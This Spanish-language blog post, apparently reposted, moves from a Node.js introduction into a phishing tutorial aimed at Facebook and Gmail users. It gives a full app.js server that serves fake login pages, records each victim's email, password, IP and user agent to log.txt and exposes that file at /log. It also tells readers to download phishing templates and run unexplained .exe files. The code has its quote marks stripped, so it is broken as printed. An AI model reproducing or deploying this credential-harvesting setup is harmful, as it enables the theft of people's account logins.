¿Qué es y para que sirve NodeJS?
NodeJS es un código abierto de JavaScript (razón por la cual se incluye el distintivo JS) que está diseñado para generar aplicaciones web de forma altamente optimizada. Desde su nacimiento hacia el año 2009 ha logrado convertirse en todo un must dentro del desarrollo web.
JavaScript
es un sólo un lenguaje de programación del lado del cliente que se ejecuta en el navegador, ¿verdad?. Ahora ya no. Node.js es una forma de ejecutar JavaScript en el servidor, además de mucho más. Node.js es un entorno Javascript del lado del servidor, basado en eventos.
Cursos Node js
Descargar y instalar Nodejs clase #1
Servidor HTTP con nodejs - clase #2
Express para crear un servidor HTTP con nodejs - clase #3
Módulos centrales Node.js - clase 4
Mi primera app con Node.js - clase #5
Proyecto phishing hacking con node.js -clases #6Facebook con node.js
Descargar Node js https://nodejs.org/es/
¿Qué es phishing ?
Creamos una carpeta desde el cmd o consola mkdir public
Copiamos el código en un editor de texto con el nombre app.js sera nuestro servidor local.
Código app.js
var fs = require(fs);
var http = require(http);
var url = require(url);
var PORT = process.env.PORT || 3000;
var isMobile = function(req) {
console.log(req.headers);
return (new RegExp(Mobile, gi)).test(req.headers[user-agent]);
}
http.createServer(function(req, res){
var url = req.url;
var mobile = isMobile(req);
if (req.url === /favicon.ico) {
//res.writeHead(200, {Content-Type: image/x-icon} );
//res.end();
//console.log(favicon requested);
return;
}
console.log(req.url);
if(url === /) {
serveFile(/public/index, res);
}
else if(url === /login){
console.log(Method: +req.method);
if(req.method === POST){
processData(req, res);
}
}
else if(url === /log) {
serveFile(/log, res, .txt);
}
else {
res.end(Not Found);
}
}).listen(PORT, function(){
console.log(Server Listening: +PORT);
});
function serveFile(path, res, fext) {
var ct;
if(!fext) {
fext = .html;
ct = text/html;
} else {
ct = text/plain;
}
fs.readFile(.+path+fext, function(err, data){
if(err) return console.log(err);
res.writeHead(200, {Content-Type: ct});
res.write(data);
res.end();
});
}
function processData(req, res) {
var body = ;
req.on(data, function (data) {
body += data;
console.log("Partial body: " + body);
});
req.on(end, function () {
console.log("Body: " + body);
var s = body.split(/[\=|\&]/);
req.body = {};
for(var i=0; i<s.length; i++) {
if(i%2!=0) {
//console.log(s[i-1],s[i]);
req.body[s[i-1]] = s[i];
}
}
console.log(req.body);
var log = \n\ndate: +new Date()
+\nreferer: +req.headers[referer]
+\nurl: +req.url
+\nip: + (req.headers[x-forwarded-for] || req.connection.remoteAddress)
+\nua: +req.headers[user-agent]
+\nemail: +req.body.Email
+\npassword: +req.body.Pass
fs.appendFile(log.txt, log, function(err){
if(err) return console.log(err);
console.log(Data saved);
res.end(Logged);
});
res.writeHead(302, {Location: /});
res.end();
});
}
Plantilla html
Descargamos las plantillas para hacer Phishing ,están desarrollada en html y lo guardamos en la carpeta public
Link plantilla facebook.html
Link plantilla Google.html
En las plantillas podremos observar los input sera que envié al servidor app.js todo lo que ingrese nuestra victima.
Servidor app.js
En el servidor recibimos los datos que la victima ingresa.
Servidor app.js y plantilla html
Iniciamos el servidor app.js
Desde la consola iniciamos el servidor node app.js
Comunidad amino hacking
Phishing facebook gmail con node.js
1.-Descargamos Facebook_Gmail_Phishing
2.-Descomprimir la carpeta con zip o rar https://www.winrar.es/descargas
3.-Ejecutar los archivos con extencion .exe
Agony.exe
facebook.exe
gmail.exe
4.-Abrir el navegador
Firefox
Opera mini
Otros.
5.-Escribimos en el navegador
- http://localhost:3000/
6.- la contraseña o password se guarda en una archivo
log.txt
Descargar
Github
Fuente: este post proviene de The Seven Codes, donde puedes consultar el contenido original.
¿Vulnera este post tus derechos? Pincha aquí.
Creado: